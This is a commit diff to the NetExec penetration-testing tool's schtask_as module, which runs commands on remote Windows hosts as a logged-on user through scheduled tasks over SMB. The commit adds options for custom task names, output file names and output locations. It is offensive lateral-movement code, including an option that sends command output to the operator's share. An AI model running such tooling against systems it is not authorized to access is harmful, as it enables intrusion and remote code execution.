
Commit 7657f96

authored
Merge pull request Pennyw0rth#342 from Kahvi-0/main
schtask_as Improvement - Options for custom task, file, and location.
2 parents 9cc44f6 + 0175be7 commit 7657f96

1 file changed

Lines changed: 27 additions & 7 deletions


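--- a/nxc/modules/schtask_as.py
+++ b/nxc/modules/schtask_as.py
@@ -15,17 +15,29 @@ class NXCModule:
 """
 
 def options(self, context, module_options):
-"""
+r"""
 CMD Command to execute
 USER User to execute command as
+TASK OPTIONAL: Set a name for the scheduled task name
+FILE OPTIONAL: Set a name for the command output file
+LOCATION OPTIONAL: Set a location for the command output file (e.g. '\tmp\')
 """
-self.cmd = self.user = self.time = None
+self.cmd = self.user = self.task = self.file = self.location = self.time = None
 if "CMD" in module_options:
 self.cmd = module_options["CMD"]
 
 if "USER" in module_options:
 self.user = module_options["USER"]
 
+if "TASK" in module_options:
+self.task = module_options["TASK"]
+
+if "FILE" in module_options:
+self.file = module_options["FILE"]
+
+if "LOCATION" in module_options:
+self.location = module_options["LOCATION"]
+
 name = "schtask_as"
 description = "Remotely execute a scheduled task as a logged on user"
 supported_protocols = ["smb"]
@@ -51,6 +63,9 @@ def on_admin_login(self, context, connection):
 connection.domain,
 self.user,
 self.cmd,
+self.file,
+self.task,
+self.location,
 connection.kerberos,
 connection.aesKey,
 connection.host,
@@ -79,7 +94,7 @@ def on_admin_login(self, context, connection):
 
 
 class TSCH_EXEC:
-def __init__(self, target, share_name, username, password, domain, user, cmd, doKerberos=False, aesKey=None, remoteHost=None, kdcHost=None, hashes=None, logger=None, tries=None, share=None):
+def __init__(self, target, share_name, username, password, domain, user, cmd, file, task, location, doKerberos=False, aesKey=None, remoteHost=None, kdcHost=None, hashes=None, logger=None, tries=None, share=None):
 self.__target = target
 self.__username = username
 self.__password = password
@@ -99,6 +114,9 @@ def __init__(self, target, share_name, username, password, domain, user, cmd, do
 self.logger = logger
 self.cmd = cmd
 self.user = user
+self.file = file
+self.task = task
+self.location = location
 
 if hashes is not None:
 if hashes.find(":") != -1:
@@ -181,7 +199,11 @@ def gen_xml(self, command, fileless=False):
 <Command>cmd.exe</Command>
 """
 if self.__retOutput:
-self.__output_filename = f"\\Windows\\Temp\\{gen_random_string(6)}"
+fileLocation = "\\Windows\\Temp\\" if self.location is None else self.location
+if self.file is None:
+self.__output_filename = os.path.join(fileLocation, gen_random_string(6))
+else:
+self.__output_filename = os.path.join(fileLocation, self.file)
 if fileless:
 local_ip = self.__rpctransport.get_socket().getsockname()[0]
 argument_xml = f" <Arguments>/C {command} &gt; \\\\{local_ip}\\{self.__share_name}\\{self.__output_filename} 2&gt;&amp;1</Arguments>"
@@ -207,9 +229,7 @@ def execute_handler(self, command, fileless=False):
 
 dce.set_credentials(*self.__rpctransport.get_credentials())
 dce.connect()
-
-tmpName = gen_random_string(8)
-
+tmpName = gen_random_string(8) if self.task is None else self.task
 xml = self.gen_xml(command, fileless)
 
 self.logger.info(f"Task XML: {xml}")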
